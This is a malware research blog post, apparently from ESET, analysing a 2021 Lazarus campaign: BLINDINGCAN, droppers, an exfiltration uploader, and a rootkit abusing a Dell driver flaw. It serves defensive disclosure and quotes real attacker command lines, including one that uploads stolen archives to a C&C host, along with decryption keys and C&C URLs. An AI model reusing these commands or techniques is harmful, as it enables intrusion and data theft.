ESET researchers uncovered and analyzed a set of malicious tools that were used by the infamous Lazarus APT group in attacks during the autumn of 2021. The campaign started with spearphishing emails containing malicious Amazon-themed documents and targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium. The primary goal of the attackers was data exfiltration. Lazarus (also known as HIDDEN COBRA) has been active since at least 2009. It is responsible for high-profile incidents such as both the Sony Pictures Entertainment hack and tens-of-millions-of-dollar cyberheists in 2016, the WannaCryptor (aka WannaCry) outbreak in 2017, and a long history of disruptive attacks against South Korean public and critical infrastructure since at least 2011.
Key findings in this blogpost:
- The Lazarus campaign targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium.
- The most notable tool used in this campaign represents the first recorded abuse of the CVE‑2021‑21551 vulnerability. This vulnerability affects Dell DBUtil drivers; Dell provided a security update in May 2021.
- This tool, in combination with the vulnerability, disables the monitoring of all security solutions on compromised machines. It uses techniques against Windows kernel mechanisms that have never been observed in malware before.
- Lazarus also used in this campaign their fully featured HTTP(S) backdoor known as BLINDINGCAN.
- The complexity of the attack indicates that Lazarus consists of a large team that is systematically organized and well prepared.
Both targets were presented with job offers – the employee in the Netherlands received an attachment via LinkedIn Messaging, and the person in Belgium received a document via email. Attacks started after these documents were opened. The attackers deployed several malicious tools on each system, including droppers, loaders, fully featured HTTP(S) backdoors, HTTP(S) uploaders and downloaders. The commonality between the droppers was that they are trojanized open-source projects that decrypt the embedded payload using modern block ciphers with long keys passed as command line arguments. In many cases, malicious files are DLL components that were side-loaded by legitimate EXEs, but from an unusual location in the file system.
The most notable tool delivered by the attackers was a user-mode module that gained the ability to read and write kernel memory due to the CVE-2021-21551 vulnerability in a legitimate Dell driver. This is the first ever recorded abuse of this vulnerability in the wild. The attackers then used their kernel memory write access to disable seven mechanisms the Windows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc., basically blinding security solutions in a very generic and robust way.
In this blogpost, we explain the context of the campaign and provide a detailed technical analysis of all the components. This research was presented at this year’s Virus Bulletin conference. Because of the originality, the main focus of the presentation is on the malicious component used in this attack that uses the Bring Your Own Vulnerable Driver (BYOVD) technique and leverages the aforementioned CVE-2021-21551 vulnerability. Detailed information is available in the white paper Lazarus & BYOVD: Evil to the Windows core.
We attribute these attacks to Lazarus with high confidence, based on the specific modules, the code-signing certificate, and the intrusion approach in common with previous Lazarus campaigns like Operation In(ter)ception and Operation DreamJob. The diversity, number, and eccentricity in implementation of Lazarus campaigns define this group, as well as that it performs all three pillars of cybercriminal activities: cyberespionage, cybersabotage, and pursuit of financial gain.
Initial access
ESET researchers discovered two new attacks: one against personnel of a media outlet in Belgium and one against an employee of an aerospace company in the Netherlands.
In the Netherlands, the attack affected a Windows 10 computer connected to the corporate network, where an employee was contacted via LinkedIn Messaging about a supposed potential new job, resulting in an email with a document attachment being sent. We contacted the security practitioner of the affected company, who was able to share the malicious document with us. The Word file Amzon_Netherlands.docx sent to the target is merely an outline document with an Amazon logo (see Figure 1). When opened, the remote template https://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=<var>_DO.PROJ (where <var> is a seven-digit number) is fetched. We were unable to acquire the content, but we assume that it may have contained a job offer for the Amazon space program, Project Kuiper. This is a method that Lazarus practiced in the Operation In(ter)ception and Operation DreamJob campaigns targeting aerospace and defense industries.
Within hours, several malicious tools were delivered to the system, including droppers, loaders, fully featured HTTP(S) backdoors, HTTP(S) uploaders and HTTP(S) downloaders; see the Toolset section.
Regarding the attack in Belgium, the employee of a journalism company (whose email address was publicly available on the company’s website) was contacted via an email message with the lure AWS_EMEA_Legal_.docx attached. Since we didn’t obtain the document, we know only its name, which suggests it might have been making a job offer in a legal position. After opening the document, the attack was triggered, but stopped by ESET products immediately, with just one malicious executable involved. The interesting aspect here is that, at that time, this binary was validly signed with a code-signing certificate.
Attribution
We attribute both attacks to the Lazarus group with a high level of confidence. This is based on the following factors, which show relationships to other Lazarus campaigns:
- Malware (the intrusion set):
- The HTTPS backdoor (SHA‑1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) has strong similarities with the BLINDINGCAN backdoor, reported by CISA (US-CERT), and attributed to HIDDEN COBRA, which is their codename for Lazarus.
- The HTTP(S) uploader has strong similarities with the tool C:\ProgramData\IBM\~DF234.TMP mentioned in the report by HvS Consulting, Section 2.10 Exfiltration.
- The full file path and name, %ALLUSERSPROFILE%\Adobe\Adobe.tmp, is identical to the one reported by Kaspersky in February 2021 in a white paper about Lazarus’s Operation ThreatNeedle, which targets the defense industry.
- The code-signing certificate, which was issued to the US company "A" MEDICAL OFFICE, PLLC and used to sign one of the droppers, was also reported in the campaign against security researchers; see also Lazarus group: 2 TOY GUYS campaign, ESET Threat report 2021 T1, Page 11.
- An unusual type of encryption was leveraged in the tools of this Lazarus campaign: HC-128. Other less prevalent ciphers used by Lazarus in the past: a Spritz variant of RC4 in the watering hole attacks against Polish and Mexican banks; later Lazarus used a modified RC4 in Operation In(ter)ception; a modified A5/1 stream cipher was used in WIZVERA VeraPort supply-chain attack.
- Infrastructure:
- For the first-level C&C server, the attackers do not use their own servers, but hack existing ones instead. This is a typical, yet weak-confidence behavior of Lazarus.
Toolset
One of the typical traits of Lazarus is its delivery of the final payload in the form of a sequence of two or three stages. It starts with a dropper – usually a trojanized open-source application – that decrypts the embedded payload with a modern block cipher like AES-128 (which is not unusual for Lazarus, e.g., Operation Bookcodes, or an obfuscated XOR, after parsing the command line arguments for a strong key. Despite the embedded payload not being dropped onto the file system but loaded directly into memory and executed, we denote such malware as a dropper. Malware that doesn’t have an encrypted buffer, but that loads a payload from a filesystem, we denote as a loader.
The droppers may (Table 1) or may not (Table 2) be side-loaded by a legitimate (Microsoft) process. In the first case here, the legitimate application is at an unusual location and the malicious component bears the name of the corresponding DLL that is among the application’s imports. For example, the malicious DLL coloui.dll is side-loaded by a legitimate system application Color Control Panel (colorcpl.exe), both located at C:\ProgramData\PTC\. However, the usual location for this legitimate application is %WINDOWS%\System32\.
In all cases, at least one command line argument is passed during runtime that serves as an external parameter required to decrypt the embedded payload. Various decryption algorithms are used; see the last column in Table 1 and Table 2. In several cases when AES-128 is used, there’s also an internal, hardcoded parameter together with the name of the parent process and its DLL name, all required for successful decryption.
Table 1. Malicious DLLs side-loaded by a legitimate process from an unusual location
Location folder | Legitimate parent process | Malicious side-loaded DLL | Trojanized project | External parameter | Decryption algorithm |
---|---|---|---|---|---|
C:\ProgramData\PTC\ | colorcpl.exe | colorui.dll | libcrypto of LibreSSL 2.6.5 | BE93E050D9C0EAEB1F0E6AE13C1595B5 (Loads BLINDINGCAN) |
XOR |
C:\Windows\Vss\ | WFS.exe | credui.dll | GOnpp v1.2.0.0 (Notepad++ plug‑in) | A39T8kcfkXymmAcq (Loads the intermediate loader) |
AES-128 |
C:\Windows\security\ | WFS.exe | credui.dll | FingerText 0.56.1 (Notepad++ plug‑in) | N/A | AES-128 |
C:\ProgramData\Caphyon\ | wsmprovhost.exe | mi.dll | lecui 1.0.0 alpha 10 | N/A | AES-128 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ | SMSvcHost.exe | cryptsp.dll | lecui 1.0.0 alpha 10 | N/A | AES-128 |
Table 2. Other malware involved in the attack
Location folder | Malware | Trojanized project | External parameter | Decryption algorithm |
---|---|---|---|---|
C:\PublicCache\ | msdxm.ocx | libpcre 8.44 | 93E41C6E20911B9B36BC (Loads the HTTP(S) downloader) |
XOR |
C:\ProgramData\Adobe\ | Adobe.tmp | SQLite 3.31.1 | S0RMM‑50QQE‑F65DN‑DCPYN‑5QEQA (Loads the HTTP(S) updater) |
XOR |
C:\PublicCache\ | msdxm.ocx | sslSniffer | Missing | HC-128 |
After successful decryption, the buffer is checked for the proper PE format and execution is passed to it. This procedure can be found in most of the droppers and loaders. The beginning of it can be seen in Figure 2.
HTTP(S) backdoor: BLINDINGCAN
We identified a fully featured HTTP(S) backdoor – a RAT known as BLINDINGCAN – used in the attack.
This payload’s dropper was executed as %ALLUSERSPROFILE%\PTC\colorui.dll; see Table 1 for details. The payload is extracted and decrypted using a simple XOR but with a long key, which is a string built by concatenating the name of the parent process, is own filename, and the external command line parameter – here COLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.
The payload, SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2, is a 64-bit VMProtect-ed DLL. A connection is made to one of the remote locations https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. Within the virtualized code we pivoted via the following very specific RTTI artifacts found in the executable: .?AVCHTTP_Protocol@@, .?AVCFileRW@@. Moreover, there’s a similarity on the code level, as the indices of the commands start with the same value, 8201; see Figure 3. This helped us to identify this RAT as BLINDINGCAN (SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D), reported for the first time by CISA. The recent version of this payload was observed in another Amazon-themed campaign, where BLINDINGCAN was dropped by a trojanized Putty-0.77 client: see Mandiant’s blog.
Based on the number of command codes that are available to the operator, it is likely that a server-side controller is available where the operator can control and explore compromised systems. Actions made within this controller probably result in the corresponding command IDs and their parameters being sent to the RAT running on the target’s system. The list of command codes is in Table 3 and agrees with the analysis done by JPCERT/CC, Appendix C. There are no validation checks of parameters like folder or filenames. That means all the checks have to be implemented on the server side, which suggests that the server-side controller is a complex application, very likely with a user-friendly GUI.
Table 3. The RAT’s commands
Command | Description |
---|---|
8201 | Send system information like computer name, Windows version, and the code page. |
8208 | Get the attributes of all files in mapped RDP folders (\\tsclient\C etc.). |
8209 | Recursively get the attributes of local files. |
8210 | Execute a command in the console, store the output to a temporary file, and upload it. |
8211 | Zip files in a temporary folder and upload them. |
8212 | Download a file and update its time information. |
8214 | Create a new process in the console and collect the output. |
8215 | Create a new process in the security context of the user represented by the specified token and collect the output. |
8217 | Recursively create a process tree list. |
8224 | Terminate a process. |
8225 | Delete a file securely. |
8226 | Enable nonblocking I/O via TCP socket (socket(AF_INET , SOCK_STREAM , IPPROTO_TCP) with the FIONBIO control code). |
8227 | Set the current directory for the current process. |
8231 | Update the time information of the selected file. |
8241 | Send the current configuration to the C&C server. |
8242 | Update the configuration. |
8243 | Recursively list the directory structure. |
8244 | Get type and free disk space of a drive. |
8249 | Continue with the next command. |
8256 | Request another command from the C&C server. |
8262 | Rewrite a file without changing its last write time. |
8264 | Copy a file to another destination. |
8265 | Move a file to another destination. |
8272 | Delete a file. |
8278 | Take a screenshot. |
Intermediate loader
Now we describe a three-stage chain where, unfortunately, we were able to identify only the first two steps: a dropper and an intermediate loader.
The first stage is a dropper located at C:\Windows\Vss\credui.dll and was run via a legitimate – but vulnerable to DLL search-order hijacking – application with the (external) parameter C:\Windows\Vss\WFS.exe A39T8kcfkXymmAcq. The program WFS.exe is a copy of the Windows Fax and Scan application, but its standard location is %WINDOWS%\System32\.
The dropper is a trojanized GOnpp plug-in for Notepad++, written in the Go programming language. After the decryption, the dropper checks whether the buffer is a valid 64-bit executable and then, if so, loads it into memory, so that the second stage is ready for execution.
The goal of this intermediate stage is to load an additional payload in memory and execute it. It performs this task in two steps. It first reads and decrypts the configuration file C:\windows\System32\wlansvc.cpl, which is not, as its extension might suggest, an (encrypted) executable, but a data file containing chunks of 14944 bytes with configuration. We didn’t have the particular data from the current attack; however, we obtained such configuration from another Lazarus attack: see Figure 5.The configuration is expected to start with a double word representing the total size of the remaining buffer (see Line 69 in Figure 4 below and the variable u32TotalSize), followed by an array of 14944 byte-long structures containing at least two values: the name of the loading DLL as a placeholder for identifying the rest of the configuration (at the offset 168 of Line 74 in Figure 4 and the highlighted member in Figure 5).
The second step is the action of reading, decrypting, and loading this file that represents very likely the third and final stage. It is expected to be a 64-bit executable and is loaded into the memory the same way the first-stage dropper handled the intermediate loader. At the start of execution, a mutex is created as a concatenation of the string Global\AppCompatCacheObject and the CRC32 checksum of its DLL name (credui.dll) represented as a signed integer. The value should equal Global\AppCompatCacheObject-1387282152 if wlansvc.cpl exists and -1387282152 otherwise.
An interesting fact is the use of this decryption algorithm (Figure 4, Line 43 & 68), which is not that prevalent in the Lazarus toolset nor malware in general. The constants 0xB7E15163 and 0x61C88647 (which is -0x9E3779B9; see Figure 6, Line 29 & 35) in the key expansion suggests that it’s either the RC5 or RC6 algorithm. By checking the main decryption loop of the algorithm, one identifies that it’s the more complex of the two, RC6. An example of a sophisticated threat using such uncommon encryption is Equations Group’s BananaUsurper; see Kaspersky’s report from 2016.
HTTP(S) downloader
A downloader using the HTTP(S) protocols was delivered onto the target’s system as well.
It was installed by a first stage dropper (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657), which is a trojanized libpcre-8.44 library. It was executed by the command
cmd.exe /c start /b rundll32.exe C:\PublicCache\msdxm.ocx,sCtrl 93E41C6E20911B9B36BC
(the parameter is an XOR key for extracting the embedded payload; see Table 2). The dropper also achieves persistence by creating the OneNoteTray.LNK file located in the %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup folder.
The second stage is a 32-bit VMProtect-ed module that makes an HTTP connection request to a C&C server stored in its configuration; see Figure 7. It uses the same User Agent – Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36 – as BLINDINGCAN RAT, contains the RTTI artifact .?AVCHTTP_Protocol@@ but not .?AVCFileRW@@, and lacks features like taking screenshots, archiving files, or executing a command via the command line. It is able to load an executable to a newly allocated memory block and pass code execution to it.
HTTP(S) uploader
This Lazarus tool is responsible for data exfiltration, by using the HTTP or HTTPS protocols.
It is delivered in two stages as well. The initial dropper is a trojanized sqlite-3.31.1 library. Lazarus samples usually don’t contain a PDB path, but this loader has one, W:\Develop\Tool\HttpUploader\HttpPOST\Pro\_BIN\RUNDLL\64\sqlite3.pdb, which also suggests its functionality immediately – a HTTP Uploader.
The dropper expects multiple command line parameters: one of them is a password required to decrypt and load the embedded payload; the rest of parameters are passed to the payload. We didn’t catch the parameters, but luckily an in-the-wild use of this tool was observed in a forensic investigation by HvS Consulting:
C:\ProgramData\IBM\~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:\ProgramData\IBM\restore0031.dat data03 10000 -p 192.168.1.240 8080
The first parameter, S0RMM-50QQE-F65DN-DCPYN-5QEQA, worked as a key for the decryption routine of the dropper (to be more precise, an obfuscation was performed first, where the encrypted buffer was XOR-ed with its copy shifted by one byte; then an XOR decryption with the key followed). The rest of the parameters are stored in a structure and passed to the second stage. For the explanation of their meanings, see Table 4.
Table 4. Command line parameters for the HTTP(S) updater
Parameter | Value | Explanation |
---|---|---|
1 | S0RMM-50QQE-F65DN-DCPYN-5QEQA | A 29-byte decryption key. |
2 | https://<...> | C&C for data exfiltration. |
3 | C:\ProgramData\IBM\restore0031.dat | The name of a local RAR volume. |
4 | data03 | The name of the archive on the server side. |
5 | 10,000 | The size of a RAR split (max 200,000 kB). |
6 | N/A | Starting index of a split. |
7 | N/A | Ending index of a split. |
8 | -p 192.168.1.240 8080 | A switch -p |
9 | #rowspan# | Proxy IP address |
10 | #rowspan# | Proxy Port |
The second stage is the HTTP uploader itself. The only parameter for this stage is a structure containing the C&C server for the exfiltration, the filename of a local RAR archive, the root name of a RAR archive on the server-side, the total size of a RAR split in kilobytes, an optional range of split indices, and an optional -p switch with the internal proxy IP and a port; see Table 4. For example, if the RAR archive is split into 88 chunks, each 10,000 kB large, then the uploader would submit these splits and store them on the server side under names data03.000000.avi, data03.000001.avi, …, data03.000087.avi. See Figure 8, Line 42 where these strings are formatted.
The User-Agent is the same as for BLINDINGCAN and the HTTP(S) downloader, Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36.
FudModule Rootkit
We identified a dynamically linked library with the internal name FudModule.dll that tries to disable various Windows monitoring features. It does so by modifying kernel variables and removing kernel callbacks, which is possible because the module acquires the ability to write in the kernel by leveraging the BYOVD techniques - the specific CVE-2021-21551 vulnerability in the Dell driver dbutil_2_3.sys.
The full analysis of this malware is available as a VB2022 paper Lazarus & BYOVD: evil to the Windows core.
Other malware
Additional droppers and loaders were discovered in the attacks, but we didn’t obtain the necessary parameters to decrypt the embedded payloads or encrypted files.
Trojanized lecui
A project lecui by Alec Musafa served the attackers as a code base for trojanization of two additional loaders. By their filenames, they were disguised as Microsoft libraries mi.dll (Management Infrastructure) and cryptsp.dll (Cryptographic Service Provider API), respectively, and this was due to the intended side-loading by the legitimate applications wsmprovhost.exe and SMSvcHost.exe, respectively; see Table 1.
The main purpose of these loaders is to read and decrypt executables located in alternate data streams (ADS) at C:\ProgramData\Caphyon\mi.dll:Zone.Identifier and C:\Program Files\Windows Media Player\Skins\DarkMode.wmz:Zone.Identifier, respectively. Since we haven’t acquired these files, it’s not known which payload is hidden there; however, the only certainty is that it’s an executable, since the loading process follows the decryption (see Figure 2). The use of ADS is not new, because Ahnlab reported a Lazarus attack against South Korean companies in June 2021 involving such techniques.
Trojanized FingerText
ESET blocked an additional trojanized open-source application, FingerText 0.5.61 by erinata, located at %WINDIR%\security\credui.dll. The correct command line parameters are not known. As in some of the previous cases, three parameters were required for the AES-128 decryption of the embedded payload: the parent process’s name, WFS.exe; the internal parameter, mg89h7MsC5Da4ANi; and the missing external parameter.
Trojanized sslSniffer
The attack against a target in Belgium was blocked early in its deployment chain so only one file was identified, a 32-bit dropper located at C:\PublicCache\msdxm.ocx. It is an sslSniffer component from the wolfSSL project that has been trojanized. At the time of the attack, it was validly signed with a certificate issued to "A" MEDICAL OFFICE, PLLC (see Figure 8), which has since expired.
It has two malicious exports that the legitimate DLL doesn’t have: SetOfficeCertInit and SetOfficeCert. Both exports require exactly two parameters. The purpose of the first export is to establish persistence by creating OfficeSync.LNK, located in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, pointing to the malicious DLL and running its second export via rundll32.exe with the parameters passed to itself.
The second export, SetOfficeCert, uses the first parameter as a key to decrypt the embedded payload, but we couldn’t extract it, because the key is not known to us.
The decryption algorithm is also interesting as the attackers use HC-128 with the 128-bit key as the first parameter and for its 128-bit initialization vector, the string ffffffffffffffff. The constants revealing the cipher are displayed in Figure 10.
Conclusion
In this attack, as well as in many others attributed to Lazarus, we saw that many tools were distributed even on a single targeted endpoint in a network of interest. Without a doubt, the team behind the attack is quite large, systematically organized, and well prepared. For the first time in the wild, the attackers were able to leverage CVE-2021-21551 for turning off the monitoring of all security solutions. It was not just done in kernel space, but also in a robust way, using a series of little- or undocumented Windows internals. Undoubtedly this required deep research, development, and testing skills.
From the defenders’ point of view, it seems easier to limit the possibilities of initial access than to block the robust toolset that would be installed after determined attackers gain a foothold in the system. As in many cases in the past, an employee falling prey to the attackers’ lure was the initial point of failure here. In sensitive networks, companies should insist that employees not pursue their personal agendas, like job hunting, on devices belonging to their company’s infrastructure.
For any inquiries about our research published on WeLiveSecurity, please contact us at [email protected].
ESET Research now also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
IoCs
A comprehensive list of Indicators of Compromise and samples can be found in our GitHub repository.
SHA-1 | Filename | Detection | Description |
---|---|---|---|
296D882CB926070F6E43C99B9E1683497B6F17C4 | FudModule.dll | Win64/Rootkit.NukeSped.A | A user‑mode module that operates with the kernel memory. |
001386CBBC258C3FCC64145C74212A024EAA6657 | C:\PublicCache\msdxm.ocx | Win32/NukeSped.KQ | A dropper of the HTTP(S) downloader. |
569234EDFB631B4F99656529EC21067A4C933969 | colorui.dll | Win64/NukeSped.JK | A dropper of BLINDINGCAN side-loaded by a legitimate colorcpl.exe. |
735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2 | N/A | Win64/NukeSped.JK | A 64-bit variant of the BLINDINGCAN RAT. |
4AA48160B0DB2F10C7920349E3DCCE01CCE23FE3 | N/A | Win32/NukeSped.KQ | An HTTP(S) downloader. |
C71C19DBB5F40DBB9A721DC05D4F9860590A5762 | Adobe.tmp | Win64/NukeSped.JD | A dropper of the HTTP(S) uploader. |
97DAAB7B422210AB256824D9759C0DBA319CA468 | credui.dll | Win64/NukeSped.JH | A dropper of an intermediate loader. |
FD6D0080D27929C803A91F268B719F725396FE79 | N/A | Win64/NukeSped.LP | An HTTP(S) uploader. |
83CF7D8EF1A241001C599B9BCC8940E089B613FB | N/A | Win64/NukeSped.JH | An intermediate loader that loads an additional payload from the file system. |
C948AE14761095E4D76B55D9DE86412258BE7AFD | DBUtil_2_3.sys | Win64/DBUtil.A | A legitimate vulnerable driver from Dell, dropped by FudModule.dll. |
085F3A694A1EECDE76A69335CD1EA7F345D61456 | cryptsp.dll | Win64/NukeSped.JF | A dropper in the form of a trojanized lecui library. |
55CAB89CB8DABCAA944D0BCA5CBBBEB86A11EA12 | mi.dll | Win64/NukeSped.JF | A dropper in the form of a trojanized lecui library. |
806668ECC4BFB271E645ACB42F22F750BFF8EE96 | credui.dll | Win64/NukeSped.JC | A trojanized FingerText plug-in for Notepad++. |
BD5DCB90C5B5FA7F5350EA2B9ACE56E62385CA65 | msdxm.ocx | Win32/NukeSped.KT | A trojanized version of LibreSSL’s sslSniffer. |
Network
IP | Provider | First seen | Details |
---|---|---|---|
67.225.140[.]4 | Liquid Web, L.L.C | 2021‑10‑12 | A compromised legitimate WordPress-based site hosting the C&C server https://turnscor[.]com/wp-includes/feedback.php |
50.192.28[.]29 | Comcast Cable Communications, LLC | 2021‑10‑12 | A compromised legitimate site hosting the C&C server https://aquaprographix[.]com/patterns/Map/maps.php |
31.11.32[.]79 | Aruba S.p.A. | 2021‑10‑15 | A compromised legitimate site hosting the C&C server http://www.stracarrara[.]org/images/img.asp |
MITRE ATT&CK techniques
This table was built using version 11 of the MITRE ATT&CK framework.
Tactic | ID | Name | Description |
---|---|---|---|
Execution | T1106 | Native API | The Lazarus HTTP(S) backdoor uses the Windows API to create new processes. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | HTTP(S) backdoor malware uses cmd.exe to execute command-line tools | |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Many of the Lazarus tools are stored in an encrypted state on the file system. |
T1070.006 | Indicator Removal on Host: Timestomp | The Lazarus HTTP(S) backdoor can modify the file time attributes of a selected file. | |
T1574.002 | Hijack Execution Flow: DLL Side-Loading | Many of the Lazarus droppers and loaders use a legitimate program for their loading. | |
T1014 | Rootkit | The user-to-kernel module of Lazarus can turn off monitoring features of the OS. | |
T1027.002 | Obfuscated Files or Information: Software Packing | Lazarus uses Themida and VMProtect to obfuscate their binaries | |
T1218.011 | System Binary Proxy Execution: Rundll32 | Lazarus uses rundll32.exe to execute its malicious DLLs | |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | The Lazarus HTTP(S) backdoor uses HTTP and HTTPS to communicate with its C&C servers. |
T1573.001 | Encrypted Channel: Symmetric Cryptography | The Lazarus HTTP(S) backdoor encrypts C&C traffic using the AES-128 algorithm. | |
T1132.001 | Data Encoding: Standard Encoding | The Lazarus HTTP(S) payloads encode C&C traffic using the base64 algorithm. | |
Exfiltration | T1560.002 | Archive Collected Data: Archive via Library | The Lazarus HTTP(S) uploader can zip files of interest and upload them to its C&C. |
Resource Development | T1584.004 | Acquire Infrastructure: Server | Compromised servers were used by all the Lazarus HTTP(S) backdoor, uploader, and downloader as a C&C. |
Develop Capabilities | T1587.001 | Malware | Custom tools from the attack are likely developed by the attackers. Some exhibit highly specific kernel development capacities seen earlier in Lazarus tools. |
Execution | T1204.002 | User Execution: Malicious File | The target was lured to open a malicious Word document. |
Initial Access | T1566.003 | Phishing: Spearphishing via Service | The target was contacted via LinkedIn Messaging. |
T1566.001 | Phishing: Spearphishing Attachment | The target received a malicious attachment. | |
Persistence | T1547.006 | Boot or Logon Autostart Execution: Kernel Modules and Extensions | The BYOVD DBUtils_2_3.sys was installed to start via the Boot loader (value 0x00 in the Start key under HKLM\SYSTEM\CurrentControlSet\Services\<name>. |
T1547.001 | Boot or Logon Autostart Execution: Startup Folder | The dropper of the HTTP(S) downloader creates a LNK file OneNoteTray.LNK in the Startup folder. |
References
Ahnlab. Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Vers. 1.0. 22 September 2022. Retrieved from AhnLab Security Emergency Response Center.
Ahnlab. (2021, June 4). APT Attacks on Domestic Companies Using Library Files. Retrieved from AhnLab Security Emergency Response Center.
Ahnlab. (2022, September 22). Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Retrieved from AhnLab Security Emergency Response Center.
Breitenbacher, D., & Kaspars, O. (2020, June). Operation In(ter)ception: Aerospace and military companies in the crosshairs of cyberspies. Retrieved from WeLiveSecurity.com.
ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved from ClearSky.com.
Dekel, K. (n.d.). Sentinel Labs Security Research. CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws. Retrieved from SentinelOne.com.
ESET. (2021, June 3). ESET Threat Report T 1 2021. Retrieved from WeLiveSecurity.com.
GReAT. (2016, August 16). The Equation giveaway. Retrieved from SecureList.com.
HvS-Consulting AG. (2020, December 15). Greetings from Lazarus: Anatomy of a cyber-espionage campaign. Retrieved from hvs-consulting.de.
Cherepanov, A., & Kálnai, P. (2020, November). Lazarus supply-chain attack in South Korea. Retrieved from WeLiveSecurity.com.
Kálnai, P. (2017, 2 17). Demystifying targeted malware used against Polish banks. (ESET) Retrieved from WeLiveSecurity.com.
Kopeytsev, V., & Park, S. (2021, February). Lazarus targets defense industry with ThreatNeedle. (Kaspersky Lab) Retrieved from SecureList.com.
Lee, T.-w., Dong-wook, & Kim, B.-j. (2021). Operation BookCode - Targeting South Korea. Virus Bulletin. localhost. Retrieved from vblocalhost.com.
Maclachlan, J., Potaczek, M., Isakovic, N., Williams, M., & Gupta, Y. (2022, September 14). It's Time to PuTTY! DPRK Job Opportunity Phishing via WhatsApp. Retrieved from Mandiant.com.
Tomonaga, S. (2020, September 29). BLINDINGCAN - Malware Used by Lazarus. (JPCERT/CC) Retrieved from blogs.jpcert.or.jp.
US-CERT CISA. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. (CISA) Retrieved from cisa.gov.
Weidemann, A. (2021, 1 25). New campaign targeting security researchers. (Google Threat Analysis Group) Retrieved from blog.google.
Wu, H. (2008). The Stream Cipher HC-128. In M. Robshaw , & O. Billet , New Stream Cipher Designs (Vol. 4986). Berlin, Heidelberg: Springer. Retrieved from doi.org.